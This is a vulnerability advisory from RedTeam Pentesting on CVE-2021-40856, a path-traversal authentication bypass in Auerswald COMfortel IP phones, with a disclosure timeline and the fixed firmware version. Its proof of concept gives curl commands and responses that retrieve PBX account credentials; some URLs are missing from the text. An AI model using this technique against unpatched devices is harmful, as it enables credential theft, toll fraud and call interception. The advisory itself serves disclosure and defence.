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HistoryDec 06, 2021 - 12:00 a.m.

Auerswald COMfortel 1400/2600/3600 IP 2.8F Authentication Bypass

authentication bypass
redteam pentesting
web-based interface
configuration management
vulnerability type
security risk
published advisory





`Advisory: Auerswald COMfortel 1400/2600/3600 IP Authentication Bypass  
RedTeam Pentesting discovered a vulnerability in the web-based  
configuration management interface of the Auerswald COMfortel 1400 and  
2600 IP desktop phones. The vulnerability allows accessing configuration  
data and settings in the web-based management interface without  
Product: Auerswald COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP  
Affected Versions: <= 2.8F  
Fixed Versions: 2.8G (for COMfortel 1400 IP, COMfortel 2600 IP, COMfortel 3600 IP)  
Vulnerability Type: Authentication Bypass  
Security Risk: high  
Vendor URL:  
Vendor Status: fixed version released  
Advisory URL:  
Advisory Status: published  
CVE: CVE-2021-40856  
"The COMfortel 2600 IP is an Android-based hybrid VoIP telephone (SIP and  
IP system phone), with 4.3" colour touch display and preconfigured  
answering machine"  
(from the vendor's homepage)  
More Details  
During a penetration test it was discovened that several VoIP phones  
(COMfortel 2600 and 1400 IP) by the manufacturer Auerswald allow  
accessing administrative functions without login credentials, bypassing  
the authentication. This can be achieved by simply prefixing API  
endpoints that require authentication with "/about/../", since the  
"/about" endpoint does not require any authentication.  
Proof of Concept  
The phones run a web-based management interface on Port 80. If accessed,  
the HTTP response code 401 together with a website redirecting to the  
path "/statics/pageChallenge.html" is returned. This can for example be  
seen using the command-line HTTP client curl[1] as follows:  
$ curl --include ''  
HTTP/1.1 401 Unauthorized  
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;  
The website contains JavaScript code that requests the path  
"/about?action=get" and loads a JSON document (formatted and shortened  
to increase readability):  
$ curl --include ''  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
Cache-Control: no-cache  
Content-Length: 3673  
Date: Mon, 30 Aug 2021 08:39:24 GMT  
Server: lighttpd  
"DATA": {  
"firmware": {  
"VALUE": "2.8E",  
"KEY": "firmware"  
"serial": {  
"VALUE": "1234567890",  
"KEY": "serial"  
Among other information, this JSON document contains the serial number  
and firmware version displayed on the website. This action can be  
accessed without authentication. Other endpoints require authentication,  
for example the path "/tree?action=get", from which the menu structure  
is loaded after successful authentication:  
$ curl --include ''  
HTTP/1.1 401 Unauthorized  
<!DOCTYPE html><html><head><meta http-equiv='refresh' content='0;  
During the penetration test, it was discovered that this action can  
successfully be requested by inserting the prefix "/about/../". In order  
to prevent curl from normalizing the URL path, the option "--path-as-is"  
must be supplied:  
$ curl --include --path-as-is \  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
Cache-Control: no-cache  
Content-Length: 3808  
Date: Mon, 30 Aug 2021 08:42:11 GMT  
Server: lighttpd  
"ITEMS": {  
"COUNT": 2,  
"1": {  
"id": 31,  
"text": "applications_settings",  
"ITEMS": {  
"COUNT": 1,  
"0": {  
"target": "pageFunctionkeys.html",  
"id": 32,  
"action": "/functionkeys",  
"text": "key_app",  
"pagename": "Functionkeys",  
The endpoint "/account" allows listing account data:  
$ curl --include --path-as-is \  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
Cache-Control: no-cache  
Content-Length: 793  
Date: Mon, 30 Aug 2021 08:43:33 GMT  
Server: lighttpd  
"DATA": {  
"accountList0": {  
"KEY": "accountList0",  
"COUNT": 1,  
"VALUE": {  
"0": {  
"ID": 32327,  
"PARENTID": 0,  
"PROVIDER": "ProviderName",  
"NAME": "123 Example User",  
"STATUS": 4,  
"DEFAULT": 1  
The ID 32327 can then be used to get details about that particular  
account, including the username and password:  
$ curl --include --path-as-is \  
HTTP/1.1 200 OK  
Content-Type: application/json; charset=utf-8;  
Cache-Control: no-cache  
Content-Length: 2026  
Date: Mon, 30 Aug 2021 08:44:13 GMT  
Server: lighttpd  
"DATA": {  
"Benutzer": {  
"VALUE": "123",  
"KEY": "Benutzer"  
"Passwort": {  
"VALUE": "secret",  
"KEY": "Passwort"  
Using a script for Zed Attack Proxy[2], RedTeam Pentesting managed to  
access and use the web-based management interface as if regular login  
credentials were presented.  
It is likely that other functionality can be accessed in the same way,  
to for example change settings or activate the integrated option for  
recording the Ethernet traffic.  
Disable the web-based management interface if possible.  
Upgrade to a firmware version which corrects this vulnerability.  
Security Risk  
Inserting the prefix "/about/../" allows bypassing the authentication  
check for the web-based configuration management interface. This enables  
attackers to gain access to the login credentials used for  
authentication at the PBX, among other data.  
Attackers can then authenticate at the PBX as the respective phone and  
for example call premium rate phone lines they operate to generate  
revenue. They can also configure a device they control as the PBX in the  
phone, so all incoming and outgoing phone calls are intercepted and can  
be recorded. The device also contains a function to record all Ethernet  
data traffic, which is likely affected as well.  
Overall, the vulnerability completely bypasses the authentication for  
the web-based management interface and therefore poses a high risk.  
2021-08-26 Vulnerability identified  
2021-09-01 Customer approved disclosure to vendor  
2021-09-10 Vendor notified  
2021-09-10 CVE ID requested  
2021-09-10 CVE ID assigned  
2021-10-04 Vendor provides access to device with fixed firmware  
2021-10-05 RedTeam Pentesting examines device, vulnerability seems to be corrected  
2021-10-14 Vendor releases corrected firmware version 2.8G  
2021-12-06 Advisory published  
RedTeam Pentesting GmbH  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
More information about RedTeam Pentesting can be found at:  
Working at RedTeam Pentesting  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen  
Germany Registergericht: Aachen HRB 14004  
GeschΓ€ftsfΓΌhrer: Patrick Hof, Jens Liebchen  





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